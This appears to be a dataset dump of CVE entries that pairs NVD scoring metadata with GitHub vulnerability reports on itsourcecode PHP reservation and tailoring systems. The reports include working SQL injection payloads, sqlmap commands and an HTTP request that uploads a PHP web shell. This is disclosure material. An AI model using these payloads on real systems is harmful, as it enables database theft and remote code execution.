text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Referer: http://192.168.1.138:2223/addmeasurement.php?id=1 Accept-Encoding: gzip, deflate, br Accept-Language: zh-CN,zh;q=0.9 Cookie: __utma=123545163.603012537.1718449838.1718449838.1718449838.1; __utmz=123545163.1718449838.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=umavm58j5beqmmme0aof5v26v4 Connection: close 14=&15=&16=&17=&18=&19=&20=&21=&38=&39=&40=&41=&42=&43=&44=&45=&47=&48=&49=&50=&51=&52=&53=&54= ## Vulnerability type: + UNION query ## Vulnerability location: + 'id' parameter ## Payload: ``` Parameter: id (GET) Type: UNION query Title: Generic UNION query (NULL) - 2 columns Payload: id=1' UNION ALL SELECT CONCAT(CONCAT('qvqxq','isbpCDfcLpAYKMKNqMJiFqWJnEUFpeWoAzqmHKaL'),'qqbpq'),NULL-- GQQV ``` <img width="322" alt="2" src="https://github.com/PHJ-doit/cve/assets/173027847/a5493b0e-75ad-4f04-ad11-6c4413a82056"> ## The following are screenshots of some specific information obtained from testing and running with the sqlmap tool: ```bash sqlmap -r 123 --batch --dbs ``` <img width="315" alt="3" src="https://github.com/PHJ-doit/cve/assets/173027847/e507901c-5ed4-4fdc-9ea3-cbcc71e532dc"> # Suggested repair 1. **Use prepared statements and parameter binding:** Preparing statements can prevent SQL injection as they separate SQL code from user input data. When using prepare statements, the value entered by the user is treated as pure data and will not be interpreted as SQL code. 2. **Input validation and filtering:** Strictly validate and filter user input data to ensure it conforms to the expected format. 3. **Minimize database user permissions:** Ensure that the account used to connect to the database has the minimum necessary permissions. Avoid using accounts with advanced permissions (such as' root 'or' admin ') for daily operations. 4. **Regular security audits:** Regularly conduct code and system security audits to promptly identify and fix potential security vulnerabilities.
Itsourcecode Tailoring Management System Project In PHP With Source Code v1.0 addmeasurement.php SQL injection
https://api.github.com/repos/PHJ-doit/cve/issues/1/comments
0
2024-06-17T13:16:48Z
2024-06-17T13:16:48Z
https://github.com/PHJ-doit/cve/issues/1
2,357,328,531
1
6,091
CVE-2024-6110
2024-06-18T12:15:13.290
A vulnerability was found in itsourcecode Magbanua Beach Resort Online Reservation System up to 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file controller.php. The manipulation of the argument image leads to unrestricted upload. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-268856.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "cna@vuldb.com", "type": "Secondary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 7.3, "baseSeverity": "HIGH", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.4, "source": "cna@vuldb.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": [ { "cvssData": { "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "Safety": "NOT_DEFINED", "attackComplexity": "LOW", "attackRequirements": "NONE", "attackVector": "NETWORK", "availabilityRequirement": "NOT_DEFINED", "baseScore": 6.9, "baseSeverity": "MEDIUM", "confidentialityRequirement": "NOT_DEFINED", "exploitMaturity": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "privilegesRequired": "NONE", "providerUrgency": "NOT_DEFINED", "subAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "userInteraction": "NONE", "valueDensity": "NOT_DEFINED", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "version": "4.0", "vulnAvailabilityImpact": "LOW", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnerabilityResponseEffort": "NOT_DEFINED" }, "source": "cna@vuldb.com", "type": "Secondary" } ] }
[ { "source": "cna@vuldb.com", "tags": [ "Exploit" ], "url": "https://github.com/Laster-dev/CVE/issues/1" }, { "source": "cna@vuldb.com", "tags": [ "Permissions Required", "Third Party Advisory" ], "url": "https://vuldb.com/?ctiid.268856" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?id.268856" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?submit.358592" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit" ], "url": "https://github.com/Laster-dev/CVE/issues/1" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Permissions Required", "Third Party Advisory" ], "url": "https://vuldb.com/?ctiid.268856" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?id.268856" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?submit.358592" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:janobe:magbanua_beach_resort_online_reservation_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "6CB7216D-7848-48BA-9A2D-BFC765A0ED26", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "434" ]
434
https://github.com/Laster-dev/CVE/issues/1
[ "Exploit" ]
github.com
[ "Laster-dev", "CVE" ]
# Itsourcecode Magbanua’s Beach Resort Online Reservation System 1.0 controller.php Unrestricted Upload # NAME OF AFFECTED PRODUCT(S) + Magbanua’s Beach Resort Online Reservation System ## Vendor Homepage + https://itsourcecode.com/free-projects/php-project/magbanua-beach-resort-online-reservation-system/ # AFFECTED AND/OR FIXED VERSION(S) ## submitter + laster ## Vulnerable File + controller.php ## VERSION(S) + V1.0 ## Software Link + https://itsourcecode.com/wp-content/uploads/2016/05/magbanua.zip # PROBLEM TYPE ## Vulnerability Type + File upload ## Root Cause + In line 157 of the newdriver.php file, the input obtained through $-FILES is directly used to determine the storage location of the file without verification or cleaning. The specific code snippet is as follows: + ![1](https://github.com/Laster-dev/CVE/assets/142156774/42453996-c2d6-4836-91f0-86181e3594b3) ## Impact + Attackers can exploit this vulnerability for unrestricted uploads, which may lead to file overwrite, file injection, directory traversal attacks, and denial of service attacks. Remote attacks may also result in RCE # DESCRIPTION + laster discovered that the file upload operation was triggered on line 157 of the 'controller.php' file and the uploaded file was received using the '$-FILES' variable. Due to the lack of appropriate input validation and cleaning, remote attackers can pass malicious payloads through this file upload feature, resulting in unrestricted file uploads, which may further lead to remote code execution (RCE). # Vulnerability details and POC ## Payload ## ``` POST /admin/mod_room/controller.php?action=add HTTP/1.1 Host: 20.20.20.130:8102 Content-Length: 2677 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://20.20.20.130:8102 Content-Type: multipart/form-data; boundary=----WebKitFormBoundary0fqtxeDv9FaLBl0E User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://20.20.20.130:8102/admin/mod_room/index.php?view=add Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Connection: close ------WebKitFormBoundary0fqtxeDv9FaLBl0E Content-Disposition: form-data; name="name" 3 ------WebKitFormBoundary0fqtxeDv9FaLBl0E Content-Disposition: form-data; name="rmtype" 93 ------WebKitFormBoundary0fqtxeDv9FaLBl0E Content-Disposition: form-data; name="price" 3 ------WebKitFormBoundary0fqtxeDv9FaLBl0E Content-Disposition: form-data; name="adult" 3 ------WebKitFormBoundary0fqtxeDv9FaLBl0E Content-Disposition: form-data; name="children" 3 ------WebKitFormBoundary0fqtxeDv9FaLBl0E Content-Disposition: form-data; name="image"; filename="rce.php" Content-Type: image/jpeg Node: Sorry, due to some encoding reasons, I am unable to use Markdown to store image data with attack payloads here. I will take a screenshot to show <?php system("ipconfig"); ?> ------WebKitFormBoundary0fqtxeDv9FaLBl0E Content-Disposition: form-data; name="save" ------WebKitFormBoundary0fqtxeDv9FaLBl0E-- ``` + ![2](https://github.com/Laster-dev/CVE/assets/142156774/74dfeea8-9320-43cd-a6c5-69ece79f693c) ## I successfully executed the PHP script on the terminal + ![3](https://github.com/Laster-dev/CVE/assets/142156774/97cf92f2-ba2b-44af-b888-4b191f56e02e)
Itsourcecode Magbanua’s Beach Resort Online Reservation System 1.0 controller.php Unrestricted Upload
https://api.github.com/repos/Laster-dev/CVE/issues/1/comments
0
2024-06-17T13:45:15Z
2024-06-17T13:45:15Z
https://github.com/Laster-dev/CVE/issues/1
2,357,394,445
1
6,092
CVE-2024-6111
2024-06-18T13:15:52.193
A vulnerability classified as critical has been found in itsourcecode Pool of Bethesda Online Reservation System 1.0. This affects an unknown part of the file login.php. The manipulation of the argument email leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-268857 was assigned to this vulnerability.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "cna@vuldb.com", "type": "Secondary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 7.3, "baseSeverity": "HIGH", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.4, "source": "cna@vuldb.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": [ { "cvssData": { "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "Safety": "NOT_DEFINED", "attackComplexity": "LOW", "attackRequirements": "NONE", "attackVector": "NETWORK", "availabilityRequirement": "NOT_DEFINED", "baseScore": 6.9, "baseSeverity": "MEDIUM", "confidentialityRequirement": "NOT_DEFINED", "exploitMaturity": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "privilegesRequired": "NONE", "providerUrgency": "NOT_DEFINED", "subAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "userInteraction": "NONE", "valueDensity": "NOT_DEFINED", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "version": "4.0", "vulnAvailabilityImpact": "LOW", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnerabilityResponseEffort": "NOT_DEFINED" }, "source": "cna@vuldb.com", "type": "Secondary" } ] }
[ { "source": "cna@vuldb.com", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/wangyuan-ui/CVE/issues/1" }, { "source": "cna@vuldb.com", "tags": [ "Permissions Required", "Third Party Advisory" ], "url": "https://vuldb.com/?ctiid.268857" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?id.268857" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?submit.358988" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/wangyuan-ui/CVE/issues/1" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Permissions Required", "Third Party Advisory" ], "url": "https://vuldb.com/?ctiid.268857" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?id.268857" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?submit.358988" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:janobe:pool_of_bethesda_online_reservation_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "9DE894B7-EE1B-4ABB-8881-CF3BA3911206", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/wangyuan-ui/CVE/issues/1
[ "Exploit", "Third Party Advisory" ]
github.com
[ "wangyuan-ui", "CVE" ]
# Itsourcecode Pool of Bethesda Online Reservation System Using PHP 1.0 login.php SQL injection # NAME OF AFFECTED PRODUCT(S) + Pool of Bethesda Online Reservation System Using PHP ## Vendor Homepage + https://itsourcecode.com/free-projects/php-project/bakery-online-ordering-system/ # AFFECTED AND/OR FIXED VERSION(S) ## submitter + wangyuan-ui ## Vulnerable File + login.php ## VERSION(S) + V1.0 ## Software Link + https://itsourcecode.com/wp-content/uploads/2016/05/BethesdaReservation1.zip # PROBLEM TYPE ## Vulnerability Type + SQL injection ## Root Cause + A SQL injection vulnerability was found in the 'login.php' file of the 'Pool of Bethesda Online Reservation System Using PHP' project. The reason for this issue is that attackers inject malicious code from the parameter "email" and use it directly in SQL queries without the need for appropriate cleaning or validation. This allows attackers to forge input values, thereby manipulating SQL queries and performing unauthorized operations. ## Impact + Attackers can exploit this SQL injection vulnerability to achieve unauthorized database access, sensitive data leakage, data tampering, comprehensive system control, and even service interruption, posing a serious threat to system security and business continuity. # DESCRIPTION + During the security review of "Pool of Bethesda Online Reservation System Using PHP", wangyuan-ui discovered a critical SQL injection vulnerability in the "login.php" file. This vulnerability stems from insufficient user input validation of the 'email' parameter, allowing attackers to inject malicious SQL queries. Therefore, attackers can gain unauthorized access to databases, modify or delete data, and access sensitive information. Immediate remedial measures are needed to ensure system security and protect data integrity. # No login or authorization is required to exploit this vulnerability # Vulnerability details and POC ## Vulnerability type: + boolean-based blind + time-based blind ## Vulnerability location: + 'email' parameter ## Payload: ```sql email=111' AND 5012=(SELECT (CASE WHEN (5012=5012) THEN 5012 ELSE (SELECT 3533 UNION SELECT 3176) END))-- LJmv&pass=111&btnlogin= email=111' AND (SELECT 4462 FROM (SELECT(SLEEP(5)))aBAN)-- LtcY&pass=111&btnlogin= ``` ```makefile Parameter: email (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment) Payload: email=111' AND 5012=(SELECT (CASE WHEN (5012=5012) THEN 5012 ELSE (SELECT 3533 UNION SELECT 3176) END))-- LJmv&pass=111&btnlogin= Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: email=111' AND (SELECT 4462 FROM (SELECT(SLEEP(5)))aBAN)-- LtcY&pass=111&btnlogin= ``` + ![1](https://github.com/wangyuan-ui/CVE/assets/173124196/33a73dcb-dd6a-4816-8a43-af3142cf14d8) ## The following are screenshots of some specific information obtained from testing and running with the sqlmap tool: ```bash python sqlmap.py -u "http://localhost:8102/admin/login.php" --data="email=11&pass=11&btnlogin=" --method=POST --level=5 --risk=3 --batch --dbs ``` + ![2](https://github.com/wangyuan-ui/CVE/assets/173124196/b2e3515a-d6b6-4d8d-80ae-3460733c4150) # Suggested repair 1. **Use prepared statements and parameter binding:** Preparing statements can prevent SQL injection as they separate SQL code from user input data. When using prepare statements, the value entered by the user is treated as pure data and will not be interpreted as SQL code. 2. **Input validation and filtering:** Strictly validate and filter user input data to ensure it conforms to the expected format. 3. **Minimize database user permissions:** Ensure that the account used to connect to the database has the minimum necessary permissions. Avoid using accounts with advanced permissions (such as' root 'or' admin ') for daily operations. 4. **Regular security audits:** Regularly conduct code and system security audits to promptly identify and fix potential security vulnerabilities.
Itsourcecode Pool of Bethesda Online Reservation System Using PHP 1.0 login.php SQL injection
https://api.github.com/repos/wangyuan-ui/CVE/issues/1/comments
0
2024-06-18T04:36:29Z
2024-06-18T04:36:29Z
https://github.com/wangyuan-ui/CVE/issues/1
2,358,872,827
1
6,093
CVE-2024-6112
2024-06-18T13:15:52.550
A vulnerability classified as critical was found in itsourcecode Pool of Bethesda Online Reservation System 1.0. This vulnerability affects unknown code of the file index.php. The manipulation of the argument log_email leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-268858 is the identifier assigned to this vulnerability.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "cna@vuldb.com", "type": "Secondary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 7.3, "baseSeverity": "HIGH", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.4, "source": "cna@vuldb.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": [ { "cvssData": { "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "Safety": "NOT_DEFINED", "attackComplexity": "LOW", "attackRequirements": "NONE", "attackVector": "NETWORK", "availabilityRequirement": "NOT_DEFINED", "baseScore": 6.9, "baseSeverity": "MEDIUM", "confidentialityRequirement": "NOT_DEFINED", "exploitMaturity": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "privilegesRequired": "NONE", "providerUrgency": "NOT_DEFINED", "subAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "userInteraction": "NONE", "valueDensity": "NOT_DEFINED", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "version": "4.0", "vulnAvailabilityImpact": "LOW", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnerabilityResponseEffort": "NOT_DEFINED" }, "source": "cna@vuldb.com", "type": "Secondary" } ] }
[ { "source": "cna@vuldb.com", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/wangyuan-ui/CVE/issues/2" }, { "source": "cna@vuldb.com", "tags": [ "Permissions Required", "Third Party Advisory" ], "url": "https://vuldb.com/?ctiid.268858" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?id.268858" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?submit.358990" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/wangyuan-ui/CVE/issues/2" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Permissions Required", "Third Party Advisory" ], "url": "https://vuldb.com/?ctiid.268858" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?id.268858" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?submit.358990" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:janobe:pool_of_bethesda_online_reservation_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "9DE894B7-EE1B-4ABB-8881-CF3BA3911206", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/wangyuan-ui/CVE/issues/2
[ "Exploit", "Third Party Advisory" ]
github.com
[ "wangyuan-ui", "CVE" ]
# Itsourcecode Pool of Bethesda Online Reservation System Using PHP 1.0 index.php SQL injection # NAME OF AFFECTED PRODUCT(S) + Pool of Bethesda Online Reservation System Using PHP ## Vendor Homepage + https://itsourcecode.com/free-projects/php-project/bakery-online-ordering-system/ # AFFECTED AND/OR FIXED VERSION(S) ## submitter + wangyuan-ui ## Vulnerable File + index.php ## VERSION(S) + V1.0 ## Software Link + https://itsourcecode.com/wp-content/uploads/2016/05/BethesdaReservation1.zip # PROBLEM TYPE ## Vulnerability Type + SQL injection ## Root Cause + A SQL injection vulnerability was found in the 'index.php' file of the 'Pool of Bethesda Online Reservation System Using PHP' project. The reason for this issue is that attackers inject malicious code from the parameter "log_email" and use it directly in SQL queries without the need for appropriate cleaning or validation. This allows attackers to forge input values, thereby manipulating SQL queries and performing unauthorized operations. ## Impact + Attackers can exploit this SQL injection vulnerability to achieve unauthorized database access, sensitive data leakage, data tampering, comprehensive system control, and even service interruption, posing a serious threat to system security and business continuity. # DESCRIPTION + During the security review of "Pool of Bethesda Online Reservation System Using PHP", wangyuan-ui discovered a critical SQL injection vulnerability in the "index.php" file. This vulnerability stems from insufficient user input validation of the 'log_email' parameter, allowing attackers to inject malicious SQL queries. Therefore, attackers can gain unauthorized access to databases, modify or delete data, and access sensitive information. Immediate remedial measures are needed to ensure system security and protect data integrity. # No login or authorization is required to exploit this vulnerability # Vulnerability details and POC ## Vulnerability type: + boolean-based blind + time-based blind + UNION query ## Vulnerability location: + 'log_email' parameter ## Payload: ```sql log_email=janu@yahoo.com' AND 9900=(SELECT (CASE WHEN (9900=9900) THEN 9900 ELSE (SELECT 5465 UNION SELECT 5753) END))-- -&log_pword=admin&login= log_email=janu@yahoo.com' AND (SELECT 7888 FROM (SELECT(SLEEP(5)))fSab)-- lTbM&log_pword=admin&login= log_email=janu@yahoo.com' UNION ALL SELECT 85,CONCAT(0x71787a7071,0x4343537349634a42714f41566d6c6a474b43576d57495a4f49484746517279766c7a676f67485563,0x716b707a71),85,85,85,85,85,85,85,85#&log_pword=admin&login= ``` ```makefile Parameter: log_email (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment) Payload: log_email=janu@yahoo.com' AND 9900=(SELECT (CASE WHEN (9900=9900) THEN 9900 ELSE (SELECT 5465 UNION SELECT 5753) END))-- -&log_pword=admin&login= Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: log_email=janu@yahoo.com' AND (SELECT 7888 FROM (SELECT(SLEEP(5)))fSab)-- lTbM&log_pword=admin&login= Type: UNION query Title: MySQL UNION query (NULL) - 10 columns Payload: log_email=janu@yahoo.com' UNION ALL SELECT 85,CONCAT(0x71787a7071,0x4343537349634a42714f41566d6c6a474b43576d57495a4f49484746517279766c7a676f67485563,0x716b707a71),85,85,85,85,85,85,85,85#&log_pword=admin&login= ``` + ![1](https://github.com/wangyuan-ui/CVE/assets/173124196/bdb2db2d-247d-4133-a81e-e43f076ad8cf) ## The following are screenshots of some specific information obtained from testing and running with the sqlmap tool: ```bash python sqlmap.py -u "http://localhost:8102/admin/login.php" --data="email=11&pass=11&btnlogin=" --method=POST --level=5 --risk=3 --batch --dbs ``` + ![2](https://github.com/wangyuan-ui/CVE/assets/173124196/a028c4d4-40d1-4cf4-ad6f-7081b9894c5b) # Suggested repair 1. **Use prepared statements and parameter binding:** Preparing statements can prevent SQL injection as they separate SQL code from user input data. When using prepare statements, the value entered by the user is treated as pure data and will not be interpreted as SQL code. 2. **Input validation and filtering:** Strictly validate and filter user input data to ensure it conforms to the expected format. 3. **Minimize database user permissions:** Ensure that the account used to connect to the database has the minimum necessary permissions. Avoid using accounts with advanced permissions (such as' root 'or' admin ') for daily operations. 4. **Regular security audits:** Regularly conduct code and system security audits to promptly identify and fix potential security vulnerabilities.
Itsourcecode Pool of Bethesda Online Reservation System Using PHP 1.0 index.php SQL injection
https://api.github.com/repos/wangyuan-ui/CVE/issues/2/comments
0
2024-06-18T04:39:57Z
2024-06-18T04:40:28Z
https://github.com/wangyuan-ui/CVE/issues/2
2,358,881,049
2
6,094
CVE-2024-6114
2024-06-18T13:15:52.897
A vulnerability classified as critical has been found in itsourcecode Monbela Tourist Inn Online Reservation System up to 1.0. Affected is an unknown function of the file controller.php. The manipulation of the argument image leads to unrestricted upload. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-268866 is the identifier assigned to this vulnerability.
